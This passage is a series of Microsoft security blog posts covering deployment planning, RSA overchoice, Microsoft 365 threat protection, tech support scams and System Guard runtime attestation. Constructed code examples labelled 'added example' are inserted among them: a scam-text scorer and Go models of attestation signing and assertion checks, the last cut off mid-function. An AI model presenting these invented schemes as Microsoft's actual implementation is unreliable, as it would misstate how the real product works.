    • Consider how you control admin access to cloud services (like O365), such as permanent rights granted to their account, or requiring MFA for admins.
    • What will be your device management strategy?

      • Which platforms (iOS, Android, Windows, etc.)?
      • Do you have corporate owned devices, will you allow BYOD (Bring Your Own Device), or both?

  • Leverage the resources to build your understanding
    Define the minimum requirements to deploy and determine if those requirements will work on your legacy architecture. You can find product videos, infographics, and demos at Microsoft Docs and FastTrack resources.
  • Map your key stakeholders and influencers
    Determine who will lead your organization's various teams and departments in this transformation, which employees will need special training based on how the new security tools affect their work, and who will own deployment and ongoing operations. FastTrack will use this information to identify the context of your deployment as it maps to your employees.

As you'll discover, Envisioning can quickly add clarity and focus to an otherwise complex security roll-out. Ready to kick off a successful Envisioning process?

Start with a Success Plan

Our FastTrack Success Plan is an online tool that walks you through each step of your Envisioning experience. The Success Plan can be launched by either you or your Microsoft Partner and provides all the guidance and resources you need to plan a successful Microsoft 365 Security deployment. Once completed, the plan also provides you with a clear path to help you get the most out of your FastTrack services. To get started, simply sign in to FastTrack.

More blog posts from this series:


Overwhelmed by overchoice at RSA Conference 2018

April 25th, 2018

As over 500 companies vied for mindshare at this year's RSA conference – a cacophony of vendors pitching thousands of products from brightly colored booths – it reminded me of how challenging it was for me to separate signal from noise when I was managing global networks. And the rapid growth of vendors and solutions in the past few years makes me wonder how overwhelming the choice must seem for CISOs today.

This challenge extends well beyond the show floor of RSA. Security Operations Center (SOC) analysts parse through thousands to even millions of alerts per day, working as quickly as possible to investigate them and determine which ones represent real threats. Enterprises need tools that can help them identify and contain threats quickly, but the SOC analyst dilemma of too many alerts is echoed on the show floor. There are just too many vendor and solution choices to pick from. This phenomenon, known as overchoice, leads to paralysis, obstructing our ability to make confident choices and seek timely guidance. Psychologists have long studied this construct and found that along with paralysis, the presence of too many options can even push people into decisions that work against their best interests.

As more than 50,000 RSA attendees worked their way across the conference center floor, I watched as they encountered an endless array of ever-changing acronyms, software, and hardware to address problems they probably didn't even know they had. In the quest to create and name the next generation of most innovative solutions, new categories and acronyms abound, from SIM to SEM to SOAR, and AV to EPP to EDR. Unfortunately, these new solutions can come so fast that the features may fuzz into buzzword bingo for attendees. With IoT and the intelligent edge, there are new security scenarios for enterprises to solve for. With that come new categories of security, and new offerings flood the market. Enterprise professionals are left fighting an uphill battle across a foggy landscape.

There is a way to address all this complexity. It starts with you and your enterprise. As the person who knows your enterprise best, you are positioned to drive the decision-making process based on real-world scenarios and everyday learnings.

Vendors often try to identify problems, solve them, and hope someone needs the solutions. But every enterprise is unique, and not all threats are prioritized evenly across the board. If CISOs can assess enterprise-wide learnings and lean on the vendors to interpret and understand real-world issues, a more coherent strategy and product should emerge.

Of course, it's not always easy for enterprise CISOs to understand and prioritize their needs. If this is the case in your enterprise, third-party consultants can help assess your current security posture and forge an action plan for optimization. Once a plan is created, the buyer should drive the process and avoid unnecessary distractions that lead to evaluating dozens of options and trying to understand where the puzzle pieces fit together. Once CISOs understand and have prioritized their needs, they can also lean on the vendor to help interpret and understand those defined needs.

To better facilitate this approach, first ask, "What is the business problem I'm trying to solve?" For example: Retail organizations may want to enhance their online store to include customer intelligence to provide a better customer experience. What type of privacy security will be required to do this? Will there be compliance requirements to do this? If general themes emerge rather than more nuanced security gaps, CISOs can use a known framework, like the NIST Cybersecurity Framework. It's a useful tool for managing cybersecurity outcomes, and it covers all the verticals of cybersecurity, making it easier to adopt and join with other frameworks you might also need to incorporate in your security program.

Once you have a solid grasp of the enterprise security requirements, start to look for solutions that specifically meet those needs. Once the business problems are identified and the researching of solutions takes place, you'll bump into those pervasive acronyms again. Don't get sucked in – resist the urge to solve for every potential problem vendors are trying to solve for. Focus on the vendors whose solutions specifically address your enterprise's problems and meet your requirements. Ask your peers for their own firsthand experience. Ask them which solutions have or haven't worked for them. You can even ask vendors for references to speak with.

Once promising vendor solutions emerge, confirm that the solution will solve your enterprise's problem. Get proof that it will – which doesn't necessarily equate to knowing every single mathematical detail about the algorithms used in a solution's ML engine or reviewing each line of code. But it does mean seeing the solution in action. Demo and test-drive it, preferably in your own environment. This approach is about the buyer driving the process, and staying engaged. Like most things related to our safety and security, the more engagement, the better the outcome.

These are active times in cybersecurity. The great news is a lot of innovative, smart, and motivated companies are working hard to build intelligent solutions to thwart cyberattacks. But we're all at risk of paralysis from overchoice. Stay on target by focusing on your business problems and needs, and demand that vendors cut through the buzz to focus on proving they can deliver results. See what Microsoft presented and our latest security innovations at the RSA Conference.


Securing the modern workplace with Microsoft 365 threat protection – part 1

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

The roots of Microsoft 365 threat protection

Over the next few weeks, we'll introduce you to Microsoft 365's threat protection services and demonstrate how Microsoft 365's threat protection leverages strength of signal, integration, machine learning and AI to help secure the modern workplace from a ransomware attack. Previously, we showcased how Office 365 helps mitigate modern phishing attacks. Microsoft 365 threat protection goes even further, providing robust protection, detection, and response capabilities across an organization's entire attack surface. For those not aware, Microsoft 365 was introduced at last year's Microsoft Inspire conference, to provide an intelligent, integrated, and secure solution for the modern workplace, combining the benefits of Microsoft's flagship Windows, Office 365, and Enterprise Mobility Suite (EMS) platforms. Figure 1 shows the services which are part of Microsoft 365 threat protection and jointly help secure the modern workplace so organizations can initiate and drive their digital transformation.

Figure 1. The Microsoft 365 threat protection security services

Microsoft is committed to a security first mindset

Microsoft has always been securing products and platforms to protect our customers who rely on our software and cloud services. Our security focus is essential to meet the 24/7 business cycle demands and helps ensure our customers rarely experience downtime from a security event. Microsoft invests $1B+ annually on security, employs 3500+ security professionals, and has built several strong ecosystem partnerships. As the modern workplace grows in complexity, Microsoft continues building and enhancing its security capabilities to help our customers stay ahead of modern threats. Microsoft itself is one of the world's largest enterprises and uses the same security products to protect our organization that we offer our customers.

The Microsoft Intelligent Security Graph

For our teams at Microsoft (both in operations and development), security really begins with the Microsoft Intelligent Security Graph. It is the platform that powers Microsoft security products and services by using advanced analytics to link threat intelligence and security signals from Microsoft and partners to identify and mitigate cyberthreats. Intelligence in the Intelligent Security Graph comes from consumer and commercial services that Microsoft operates on a global scale, such as Windows, Office 365, and Azure, as shown in figure 2. At Microsoft, we have massive depth and breadth of intelligence. Across our global services, each month we scan 400 billion email messages for phishing and malware, process 450 billion authentications, execute more than 18 billion web page scans, scan more than 1.2 billion devices for threats, and perform nearly 2.6 billion unique file scans, across more than 200 cloud services. Importantly, this data always goes through strict privacy and compliance boundaries before being used for security.

Figure 2. Microsoft's Global Threat Intelligence is one of the largest in the industry

Signal from the graph is analyzed using a combination of Microsoft's industry-leading artificial intelligence and machine learning capabilities coupled with the expertise of security researchers, analysts, hunters, and engineers across the company to quickly identify attacks and emerging trends so that we can evolve the immediate detections and capabilities of Microsoft 365. All our security capabilities leverage the graph, including the threat protection services comprised of Windows Defender Advanced Threat Protection (WDATP), Office 365 Advanced Threat Protection (ATP), Office 365 Threat Intelligence, Microsoft Cloud App Security, Azure Security Center, and the newly launched Azure Advanced Threat Protection (Azure ATP).

These threat protection services also share threat signal with each other through the graph, and this signal sharing enables each service to leverage threat data not only from the threats blocked by that service but also from threats in the entire threat landscape. While this post uses the example of a sophisticated ransomware attack, customers who leverage the entire Microsoft 365 threat protection stack will have near real-time protection from many types of new and unknown threats (e.g., 0-days, advanced phishing, advanced malware, etc.) for their device ecosystem, Office 365 ecosystem, and cloud, on-premises, or hybrid infrastructures by leveraging the Intelligent Security Graph.

Microsoft 365 threat protection

The modern workplace is exposed to the rapid evolution of cyber threats, from individual threats, to sophisticated organizational breaches, to rapid cyberattacks. With the growing complexity of the modern workplace, the attack surface has rapidly expanded, to a point where no single service can adequately protect an organization. To address this, we focused on developing different services that specialize on the main threat vectors and then integrating them together via the Intelligent Security Graph. The modern workplace is composed of employee identities, enterprise applications and data, devices, and infrastructure. Microsoft 365 threat protection helps mitigate advanced threats from each of these potential threat vectors, providing an end-to-end, holistic solution securing an organization's entire attack surface, enabling:

  • Protection: against advanced threats such as 0-days, targeted phishing, ransomware, and others
  • Detection: when a breach has occurred, who has been breached, and what data has been compromised
  • Response: remediate an attack and return the organization to a no-threat state
  • Education: educate end users on how to react or respond to different types of threats

While most security solutions do not include an educational component, we have seen that many of our customers now help educate their end users on how to react and behave in the event of a cyberattack. To help address this important aspect of security, we now offer tools that can help educate end users. While the majority of attacks are still initiated via email, 2017's most destructive attacks, NotPetya and WannaCry, were not email based. One of the benefits of Microsoft 365 threat protection is seamless integration that enables rapid transfer of information across platforms and services to help ensure all attack surfaces are quickly secured no matter where a threat originates. Over the next few weeks, we will cover Microsoft 365 and how to enable (1) Protection, (2) Detection, (3) Response and Education. Next week, we'll demonstrate how Microsoft 365 threat protection helps organizations protect an enterprise from a ransomware attack.


Teaming up in the war on tech support scams

(Editor's note: Erik Wahlstrom spoke about the far-reaching impact of tech support scams and the need for industry-wide cooperation in his RSA Conference 2018 talk Tech Scams: It's Time to Release the Hounds.)


Social engineering attacks like tech support scams are so common because they're so effective. Cybercriminals want to bilk users of their money. They can spend a great deal of time and energy attacking the security of a device: brute-force passwords, develop custom and sophisticated malware, and hunt down vulnerabilities to exploit. Or they can save themselves the trouble and convince users to freely give up access to their devices and sensitive information.

Microsoft has built the most secure version of its platform in Windows 10. Core OS technologies like virtualization-based security, kernel-based mitigations, and the Windows Defender ATP stack of security defenses make it much more difficult for exploits, malware, and other threats to infect devices. Every day, machine learning and artificial intelligence in Windows Defender ATP protect millions of devices from malware outbreaks and cyberattacks. In many cases, customers may not even know they were protected. Windows 10 S, a special configuration of Windows 10, takes this even further by only running apps from the Microsoft Store, effectively preventing the vast majority of attacks.

Protect yourself from tech support scams

  • Note that Microsoft does not send unsolicited email messages or make unsolicited phone calls to request personal or financial information, or to fix your computer.
  • Remember, Microsoft will never proactively reach out to you to provide unsolicited PC or technical support. Any communication we have with you must be initiated by you.
  • Don't call the number in pop-ups. Microsoft's error and warning messages never include a phone number.

The Windows 10 security stack greatly increases the cost for attackers. Many cybercriminals instead choose to target the humans in front of the PCs. It can sometimes be easier to convince users to willingly share their passwords, account info, or to install hazardous apps onto their device than to develop malware and steal info unnoticed.

Scammers continue to capitalize on the proven effectiveness of social engineering to perpetrate tech support scams. These scams are designed to trick users into believing their devices are compromised or broken. They do this to scare or coerce victims into purchasing unnecessary support services.

To help protect customers from scammers, we continue to enhance antivirus, email, URL blocking, and browser security solutions. However, given the scale and complexity of tech support scams, how can the security industry at large work together to deal a major blow to this enduring threat?

Still a growing global problem

In 2017, Microsoft Customer Support Services received 153,000 reports from customers who encountered or fell victim to tech support scams, a 24% growth from the previous year. These reports came from 183 countries, indicating a global problem.

Approximately 15% of these customers lost money in the scam, costing them on average between $200 and $400. In some cases, victims pay a lot more. In December 2017, Microsoft received a report of a scammer emptying a bank account of 89,000 during a tech support scam in the Netherlands.

Tech support scams reported to Microsoft

In a 2016 survey sponsored by Microsoft, two in three respondents reported experiencing some form of tech support scam in the previous 12 months, with nearly one in ten losing money.

However, as with many social engineering attacks, it's tricky to put an absolute number to the problem. The figures above represent reports to Microsoft. The problem is so much bigger, given that tech support scams target customers of various other devices, platforms, or software.

An organized cybercriminal enterprise

Tech support scams come in several forms, but they share a common attack plan:

Scammers initiate these social engineering attacks in many ways, including:

  • Scam websites that use various tactics including browser dialog traps, fake antivirus detecting fake threats, and fake full-screen error messages. Scammers lead potential victims to these websites through ads, search results, typosquatting and other fraudulent mechanisms.
  • Email campaigns that use phishing-like techniques to trick recipients into clicking URLs or opening malicious attachments
  • Malware thats installed on computers to make system changes and display fake error messages
  • Unsolicited phone calls (also known as cold calls), which are telemarketing calls from scammers that pretend to be from a vendors support team

The complete attack chain shows that these attacks lead to the same goal of getting customers in contact with a call center. Once connected, a fake technician (an experienced scammer) convinces the victim of a problem with their device. They often scare victims with urgent problems requiring immediate action. They instruct victims to install remote administration tools (RATs), which provide the scammers access to and control over the device.

tech support scams attack chain

From this point on, scammers can make changes to the device or point out common non-critical errors, and present these as problems. For example, scammers are known to use Event Viewer to show errors or netstat to show connections to foreign IP addresses. The scammers then attempt to make the sale. With control of the device, scammers can make a compelling case about errors in the device and pressure the victim to pay.

An industry-wide problem requires industry-wide action

The tech support scam problem is far-reaching. Its impact spans various platforms, devices, software, and services. Examples include:

  • Tech support scams targeting specific platforms like Windows, macOS, iOS, and Android
  • Tech support scam websites that imply a formal relationship or some sort of approval by well-known vendors
  • Fake malware detection from programs or websites that mimic various antivirus solutions
  • Customized tech support scams that tailor messages and techniques based on geography, OS, browser, or ISP

As in many forms of social engineering attacks, customer education is key. There are tell-tale signs: normal error and warning messages should not have phone numbers, most vendors don't make unsolicited phone calls to fix a device, etc. To help protect and educate Microsoft customers, we have published blogs, websites, videos, and social media campaigns on the latest tech support scam trends and tactics. We have also empowered customers to report tech support scams.
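The tell-tale signs above can be turned into a simple triage heuristic for text captured from a pop-up, web page, or email. The following is an added example, not Microsoft's detection logic; the word lists, weights, threshold, and the constructed sample texts are all assumptions.

```python
import re
from dataclasses import dataclass, field

# Added example (not Microsoft's code): heuristic scorer for tech-support-scam indicators.
# Weights, thresholds and word lists are hypothetical and meant for educational triage only.

# US-style and generic international phone number shapes.
PHONE_RE = re.compile(r"(?:\+?\d{1,3}[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")

ALERT_WORDS = ("alert", "warning", "blocked", "infected", "virus", "malware", "hacked")
URGENCY_WORDS = ("immediately", "call now", "do not close", "do not restart",
                 "do not shut down", "within 24 hours")
BRAND_WORDS = ("microsoft", "windows", "apple", "google")
SUPPORT_WORDS = ("support", "technician", "helpline", "toll free", "toll-free")

SCAM_THRESHOLD = 5  # hypothetical cut-off


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def likely_scam(self) -> bool:
        return self.score >= SCAM_THRESHOLD


def score_text(text: str) -> Verdict:
    """Score a pop-up, web page or email body for tech-support-scam indicators."""
    lowered = text.lower()
    v = Verdict()
    phones = PHONE_RE.findall(text)
    has_alert = any(w in lowered for w in ALERT_WORDS)
    if phones:
        v.score += 3
        v.reasons.append(f"phone number present ({len(phones)} found)")
    if has_alert:
        v.score += 2
        v.reasons.append("alert/warning language")
    if phones and has_alert:
        # The tell-tale sign from the post: genuine error and warning messages carry no phone number.
        v.score += 2
        v.reasons.append("phone number inside an alert or warning")
    if any(w in lowered for w in URGENCY_WORDS):
        v.score += 1
        v.reasons.append("urgency pressure")
    if any(b in lowered for b in BRAND_WORDS) and any(s in lowered for s in SUPPORT_WORDS):
        v.score += 1
        v.reasons.append("vendor support impersonation")
    return v


# Constructed samples (not real scam pages); phone numbers use reserved 555 ranges.
SAMPLES = {
    "scam_popup": "WINDOWS SECURITY ALERT: Your computer has been blocked. Error # 0x80070005. "
                  "Call Microsoft Support immediately at 1-800-555-0199. Do not close this window.",
    "scam_email": "Your Windows license has expired and your PC is infected with 3 viruses. "
                  "Call now: +1 (844) 555-0142.",
    "real_error": "Windows cannot access the specified device, path, or file. You may not have "
                  "the appropriate permissions to access the item. Error code 0x80070005.",
    "contact_page": "Contact Contoso customer service at (888) 555-0123, Monday through Friday.",
}


def classify_samples(samples=SAMPLES) -> dict:
    """Map each sample name to True (likely scam) or False."""
    return {name: score_text(text).likely_scam for name, text in samples.items()}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        v = score_text(text)
        print(f"{name:13s} score={v.score:2d} scam={v.likely_scam} reasons={v.reasons}")
```

A phone number alone (the contact page) stays below the threshold; it is the combination of a phone number with alert language and urgency that separates the scam samples from a genuine Windows error message.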

Beyond customer education, the scale and complexity of tech support scams require cooperation and broad partnerships across the industry. The Microsoft Digital Crimes Unit (DCU) works with law enforcement and other agencies to crack down on scammers.

We have further built partnerships across the ecosystem to make a significant dent on this issue:

  • Web hosting providers, which can take down verified tech support scam websites
  • Telecom networks, which can block tech support scam phone numbers
  • Browser developers, who can continuously thwart tech support scam tactics and block tech support scam websites
  • Antivirus solutions, which can detect tech support scam malware
  • Financial networks, which can help protect customers from fraudulent transactions
  • Law enforcement agencies, who can go after the crooks

We seek to continue expanding and enriching these partnerships. While we continue to help protect customers through a hardened platform and increasingly better security solutions, we believe it's high time for the industry to come together and put an end to the tech support scam problem. Together, we can make our customers' lives easier and safer.



Erik Wahlstrom
Windows Defender Research Project Manager



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Introducing Windows Defender System Guard runtime attestation

At Microsoft, we want users to be in control of their devices, including knowing the security health of these devices. If important security features should fail, users should be aware. Windows Defender System Guard runtime attestation, a new Windows platform security technology, fills this need.

In Windows 10 Fall Creators Update, we reorganized all system integrity features into Windows Defender System Guard. This move allowed us to continually make significant innovations in platform security. Windows Defender System Guard runtime attestation, which is built into the core Windows operating system, will soon be delivered in all editions of Windows. Windows Defender System Guard runtime attestation, like Credential Guard, takes advantage of the same hardware-rooted security technologies in virtualization-based security (VBS) to mitigate attacks in software.

Security technologies are targeted by exploits that attempt to run in the same domain of trust. For example, privileged processes are designed to provide a certain degree of isolation (at least in respect to code and data) from regular user-mode processes. The NT kernel determines whether a process is protected based on certain values held in the executive process object. Tampering with these values via a kernel exploit or with a driver (e.g., Mimikatz) can effectively disable process protection. Moving the security decision related to tampering to a separate domain of trust increases complexity for attackers.

Runtime attestation can help in many scenarios, including:

  • Providing supplementary signals for endpoint detection and response (EDR) and antivirus vendors (including full integration with the Windows Defender Advanced Threat Protection stack)
  • Detecting artifacts of kernel tampering, rootkits, and exploits
  • Protected game anti-cheat scenarios (for example, detection of process-protection bypasses that can lead to game-state modification)
  • Sensitive transactions (banking apps, trading platforms)
  • Conditional access (enabling and enhancing device security-based access policies)

With the next update to Windows 10, we are implementing the first phase of Windows Defender System Guard runtime attestation, laying the groundwork for future innovation in this area. This includes developing new OS features to support efforts to move towards a future where violations of security promises are observable and effectively communicated in the event of a full system compromise, such as through a kernel-level exploit.

Attestation and establishing trust

To introduce Windows Defender System Guard runtime attestation on a technical level, it's best to begin at the most visible layer: a client API that will eventually be exposed to a relying party. (Note: We share details of the general design as it's currently architected; the final implementation may differ.)

We are working towards providing an API that relying parties can use to attest to the state of the device at a point in time. The API returns a runtime report that details the claims that Windows Defender System Guard runtime attestation makes about the security posture of the system. These claims include assertions, which are runtime measurements of sensitive system properties.

For the runtime report to have any significant meaning, it must be generated in a fashion that provides reasonable resistance against tampering. This gives rise to the following basic component requirements:

  1. Runtime report generation must be isolated from an attacker
  2. This isolation must be attestable
  3. The runtime report must be cryptographically signed in a manner that is irreproducible outside the isolated environment

Enter VBS enclaves. We're not going to describe these enclaves in depth here, but it's prudent to give some context. On a device with virtual secure mode (VSM) enabled, virtualization extensions of the underlying Instruction Set Architecture (ISA) are employed to logically divide the system into two (theoretically, more) separate worlds: the normal world running the NT kernel that we're all familiar with and a separate secure world running a Secure Kernel (SK). We call these two logical levels of separation Virtual Trust Levels (VTLs), in this case NT being VTL-0 and SK being VTL-1.

VBS enclaves enable what can be thought of as a siloed part of a normal world VTL-0 user-mode process. All code and data in this silo live in VTL-1. Transactions in and out of an enclave are done via a well-defined API backed by VSL calls (the mechanism that NT and SK use to communicate). The result of this intricacy is that, as of Windows Fall Creators Update (1709), it is possible to execute code and hold data within an enclave such that the entire VTL-0 normal world, both user-mode and kernel-mode, cannot directly act upon the siloed code and data while they are executing and held within the enclave (in VTL-1).

From the VBS enclave, the runtime attestation component can observe and attest to a set of security properties contained in a report. For example, an app could ask Windows Defender System Guard to measure the security of the system from the hardware-backed enclave and return a report. The details in this report can be used by the app to decide whether it performs a sensitive financial transaction or displays personal information.

VBS enclaves can also expose an enclave attestation report signed by a VBS-specific signing key. If Windows Defender System Guard can obtain proof that the host system is running with VSM active, it can use this proof together with a signed session report to ensure that the particular enclave is running.

As for the signature of the runtime report itself, an asymmetric public-private key pair is generated within the enclave. The public key is signed by the Windows Defender System Guard attestation service backend to create a session certificate. In addition, the Windows Defender System Guard attestation service backend produces a signed session report containing details about the machine. These details include boot security properties, such as whether the machine booted with Secure Boot enabled, to ensure that the core operating system has not been jailbroken or tampered with. Finally, runtime reports are signed locally by the paired private key, which never leaves the enclave. Relying parties can verify the runtime and session reports with little effort: check the report signatures against the session certificate, then ensure that the certificate is validly signed and rooted in the relevant Microsoft CA.

Establishing the trust necessary to guarantee that the runtime report is authentic, therefore, requires the following:

  • Attesting to the boot state of the machine: the OS, hypervisor, and Secure Kernel (SK) binaries must be signed by Microsoft and configured according to a secure policy
  • Binding trust between the TPM and the health of the hypervisor to allow trust in the Measured Boot Log
  • Extracting the VSM IDKs from the Measured Boot Log and using these to verify the VBS enclave signature
  • Backend verification of the above and signing of the public component of an ephemeral key-pair generated within the enclave with a trusted CA to issue a session certificate
  • Signing of the runtime report with the ephemeral private key

Networking calls between the enclave and the Windows Defender System Guard attestation service are made from VTL-0. However, the design of the attestation protocol ensures that it is resilient against tampering even over untrusted transport mechanisms.

Numerous underlying technologies are required before the chain of trust described above can be sufficiently established. To inform a relying party of the level of trust in the runtime report that they can expect on any particular configuration, a security level is assigned to each Windows Defender System Guard attestation service-signed session report. The security level reflects the underlying technologies enabled on the platform and attributes a level of trust based on the capabilities of the platform. We are mapping the enablement of various security technologies to security levels, and we will share this when the API is published for third-party use. The highest level of trust is likely to require the following features, at the very least:

  • VBS-capable hardware + OEM configuration
  • Dynamic root-of-trust measurements at boot
  • Secure boot to verify hypervisor, NT, SK images
  • Secure policy ensuring:

    • Hypervisor-protected code integrity (HVCI)-enforced kernel mode code integrity (KMCI)
    • Test-signing is disabled
    • Kernel debugging is disabled
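
The signing chain described above (an ephemeral key pair generated in the enclave, a backend-issued session certificate over its public key, a runtime report signed with the private key, and the relying party's two signature checks) together with the all-features-required gate for the highest security level, as an added example in Go. This is not Microsoft's code and does not call the real Windows Defender System Guard API: the report layouts, the signed-JSON-over-Ed25519 stand-in for the X.509 session certificate and the Microsoft CA, the 1-to-3 security-level scale and the machine id are assumptions made for illustration, and the real mapping of platform features to levels is unpublished.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"errors"
	"fmt"
)

// PlatformFeatures holds the boot-time properties the post lists as likely
// prerequisites for the highest security level.
type PlatformFeatures struct {
	VBSCapableHardware, DynamicRootOfTrust, SecureBoot bool
	HVCI, TestSigningDisabled, KernelDebugDisabled     bool
}

// HighestLevelEligible is true only when every listed feature is present.
func HighestLevelEligible(f PlatformFeatures) bool {
	return f.VBSCapableHardware && f.DynamicRootOfTrust && f.SecureBoot &&
		f.HVCI && f.TestSigningDisabled && f.KernelDebugDisabled
}

// SessionReport is the backend-signed document: boot properties, the assigned
// level (placeholder scale: 1 lowest, 3 highest) and the enclave's ephemeral
// public key. The layout is hypothetical.
type SessionReport struct {
	MachineID     string
	Features      PlatformFeatures
	SecurityLevel int
	SessionPubKey []byte
}

// SessionCertificate stands in for the X.509 session certificate: the report
// plus the backend CA's signature over its canonical JSON encoding.
type SessionCertificate struct {
	Report    SessionReport
	Signature []byte
}

// RuntimeReport carries the assertion results and is signed with the
// ephemeral private key that never leaves the enclave.
type RuntimeReport struct {
	SessionPubKey []byte
	Claims        map[string]bool
	Signature     []byte
}

// canonical encodes v as JSON; encoding/json writes struct fields in declaration
// order and map keys sorted, so signer and verifier sign and check identical bytes.
func canonical(v interface{}) []byte {
	b, err := json.Marshal(v)
	if err != nil {
		panic(err) // unreachable for the plain types used here
	}
	return b
}

// IssueSession models the backend: assign a level, bind the enclave's public
// key into the report, and sign it with the CA key.
func IssueSession(caPriv ed25519.PrivateKey, machineID string, f PlatformFeatures, enclavePub ed25519.PublicKey) SessionCertificate {
	level := 1
	if HighestLevelEligible(f) {
		level = 3
	}
	r := SessionReport{MachineID: machineID, Features: f, SecurityLevel: level, SessionPubKey: enclavePub}
	return SessionCertificate{Report: r, Signature: ed25519.Sign(caPriv, canonical(r))}
}

// SignRuntimeReport is the in-enclave step: sign the claims with the ephemeral private key.
func SignRuntimeReport(enclavePriv ed25519.PrivateKey, claims map[string]bool) RuntimeReport {
	rr := RuntimeReport{SessionPubKey: enclavePriv.Public().(ed25519.PublicKey), Claims: claims}
	rr.Signature = ed25519.Sign(enclavePriv, canonical(rr))
	return rr
}

// VerifyRuntimeReport is the relying-party check: the certificate chains to the
// CA, the report's key is the certified key, and the report signature holds.
func VerifyRuntimeReport(caPub ed25519.PublicKey, cert SessionCertificate, rr RuntimeReport) error {
	if !ed25519.Verify(caPub, canonical(cert.Report), cert.Signature) {
		return errors.New("session certificate is not signed by the trusted CA")
	}
	if !bytes.Equal(cert.Report.SessionPubKey, rr.SessionPubKey) {
		return errors.New("runtime report key does not match the session certificate")
	}
	unsigned := rr
	unsigned.Signature = nil // the signature covers everything but itself
	if !ed25519.Verify(ed25519.PublicKey(rr.SessionPubKey), canonical(unsigned), rr.Signature) {
		return errors.New("runtime report signature is invalid")
	}
	return nil
}

func main() {
	caPub, caPriv, _ := ed25519.GenerateKey(rand.Reader)           // stands in for the Microsoft CA
	enclavePub, enclavePriv, _ := ed25519.GenerateKey(rand.Reader) // generated inside the enclave
	ideal := PlatformFeatures{true, true, true, true, true, true}
	cert := IssueSession(caPriv, "constructed-machine-01", ideal, enclavePub)
	rr := SignRuntimeReport(enclavePriv, map[string]bool{"protectedProcessesIntact": true})
	fmt.Println("level:", cert.Report.SecurityLevel, "verify:", VerifyRuntimeReport(caPub, cert, rr))
	rr.Claims["protectedProcessesIntact"] = false // tamper with the claims after signing
	fmt.Println("verify after tampering:", VerifyRuntimeReport(caPub, cert, rr))
}
```

The relying party never needs the enclave's private key or a channel to the enclave: it holds only the CA public key and checks two signatures, which is why the post can let the transport run from VTL-0. Tampering with the claims, swapping in a report signed by an uncertified key, or presenting a certificate from a different CA each fails at a distinct step.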


Now that we have explained the trusted report component, let us discuss the contents of the runtime report.

The security level exposed in the session report is an important and interesting metric in and of itself. However, Windows Defender System Guard can provide much more, specifically with respect to runtime measurement of system security posture.

We call this runtime measurement component the assertion engine. The idea is to continually measure and assert system integrity at runtime, with the security level attesting to security posture at boot.

Some caveats:

  • The assertion engine was designed with the ideal system configuration in mind (i.e., a system configuration with the highest security level)

    • Business needs require Windows Defender System Guard runtime attestation to function on systems even with the lowest security level; Windows Defender System Guard runtime attestation makes no guarantees in this scenario and can act as a signal for other security products on non-locked down editions of Windows

  • When running the ideal configuration, non-ROP kernel-mode code execution is difficult due to hypervisor-protected code integrity (HVCI)-enforced kernel mode code integrity (KMCI); in this scenario:

    • Data corruption attacks are more likely
    • It can be assumed that it’s difficult to tamper with any required kernel-mode agents in non-racing scenarios
    • The runtime assertions are therefore targeted at attacks that can reasonably be performed under the most restrictive attack conditions

  • We are working within the limitations of (current) operating system design

    • We have a deep partnership with other teams in Microsoft, and we are working in tandem to improve System Guard runtime attestation and core kernel security features. In the current version of the OS, we rely on NT kernel thread management and the Secure Kernel primitives provided to us.

Windows Defender System Guard runtime attestation architecture

High-level overview of Windows Defender System Guard runtime attestation architecture

Architecturally, the solution is collectively referred to as the Windows Defender System Guard runtime monitor and consists of the following client-side components:

  • The VTL-1 assertion engine itself
  • A VTL-0 kernel-mode agent
  • A VTL-0 process we call the broker to host the assertion engine

To rapidly respond to threats, we opted for a dynamic scripting approach that will allow us to frequently release updates going forward. We chose an open-source library that met our requirements for maturity, footprint, and performance. This scripting component forms the core of the assertion engine that executes in VTL-1 (if available).

Running arbitrary logic in this engine wouldn't be very useful if it couldn't interact with the system in any way. For the engine to perform useful work, we provide native helpers in the form of assists. These assists are executed in VTL-0 either by the broker service or by a kernel-mode agent.

In the next update to Windows, assertion logic is delivered in-band (within the signed engine DLL itself). At some point in the future, these scripts will be delivered out-of-band. This is a core part of the design. It enables us to immediately respond to security events (for example, the discovery of new attack invariants) without the need for delivering a component update via servicing. Apps and services can take advantage of this attestation technology to ensure that the system is free from tampering and that critical processes are running as expected. This hardware-rooted proof-of-health can then be used to identify compromised machines or gate access to critical cloud services. Runtime attestation serves as a platform for a wide variety of advanced security applications.
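
An added example, not Microsoft's engine, of the shape the caveats and architecture above imply: assertions that compare a boot-time baseline against fresh measurements handed in by VTL-0 assists, targeting the data-corruption case the post singles out (a protected process whose protection values in the executive process object no longer match) and the boot-policy properties the highest level depends on, with results marked advisory at the lowest security level where the post makes no guarantees. The Go types, the assertion names, the signer-class strings, the process table and the 1-to-3 level scale are constructed for illustration; the real engine runs scripted logic in VTL-1 and reads these values through its own assists.

```go
package main

import "fmt"

// ProcessState is a constructed stand-in for the few executive process object
// values a kernel-mode assist would read on the engine's behalf.
type ProcessState struct {
	PID       uint32
	Image     string
	Protected bool   // process-protection flag as the kernel reports it
	Signer    string // signer class the protection was granted under
}

// Snapshot is one measurement handed to the engine by the VTL-0 assists.
type Snapshot struct {
	Processes      []ProcessState
	HVCIEnabled    bool
	TestSigning    bool
	KernelDebugger bool
}

// Assertion compares a baseline taken at boot with a fresh snapshot.
type Assertion interface {
	Name() string
	Check(baseline, current Snapshot) (ok bool, detail string)
}

// ProtectionIntact: a process protected at baseline must still be protected, under the same signer.
type ProtectionIntact struct{}

func (ProtectionIntact) Name() string { return "protected-processes-intact" }

func (ProtectionIntact) Check(baseline, current Snapshot) (bool, string) {
	now := make(map[uint32]ProcessState, len(current.Processes))
	for _, p := range current.Processes {
		now[p.PID] = p
	}
	for _, was := range baseline.Processes {
		is, alive := now[was.PID]
		// An exited process or a PID reused by another image is lifetime, not tampering.
		if !was.Protected || !alive || is.Image != was.Image {
			continue
		}
		if !is.Protected || is.Signer != was.Signer {
			return false, fmt.Sprintf("pid %d (%s): protection changed from %v/%s to %v/%s",
				was.PID, was.Image, was.Protected, was.Signer, is.Protected, is.Signer)
		}
	}
	return true, ""
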